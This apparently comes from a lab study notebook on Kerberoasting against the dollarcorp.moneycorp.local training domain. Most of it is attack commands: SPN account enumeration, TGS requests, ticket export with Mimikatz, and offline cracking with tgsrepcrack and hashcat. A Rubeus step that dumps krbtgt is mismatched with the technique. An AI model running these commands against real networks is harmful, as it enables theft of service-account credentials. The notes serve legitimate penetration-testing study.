🟢Kerberoast
Find user accounts used as service accounts
. ./GetUserSPNs.ps1
Get-NetUser -SPN
Get-NetUser -SPN | select samaccountname,serviceprincipalname
Reguest a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
or
Request-SPNTicket "MSSQLSvc/dcorp.dollarycorp.local"
Export ticket using Mimikatz
Invoke-Mimikatz -Command '"Kerberos::list /export"'
Crack the ticket
Crack the password for the service account
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-student1@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi
.\hashcat.exe -m 18200 -a 0 <HASH FILE> <WORDLIST>

Analyzing the ticket with Rubeus
Once you have exported the ticket using Mimikatz, analyze it with Rubeus to get the hash for cracking.
.\Rubeus.exe dump /service:krbtgt /outfile:ticket.txt
Investigate the contents of ticket.txt
for the hash to use in the next step.
Using Hashcat for password recovery
Now that you have the hash, proceed with Hashcat to attempt to recover the password.
.\hashcat.exe -m 13100 -a 0 -o cracked.txt ticket.txt 10k-worst-pass.txt
Inspect cracked.txt
to see if the password recovery was successful. If the password is not found, consider using a larger or more targeted wordlist based on password creation policies.
Post-compromise steps
After successfully cracking the ticket:
Secure the compromised account immediately by resetting its password.
Investigate how the service account credentials were exposed.
Audit services that utilize this account to check for unauthorized changes or activities.
Implement account monitoring to detect future suspicious activities.
Last updated
Was this helpful?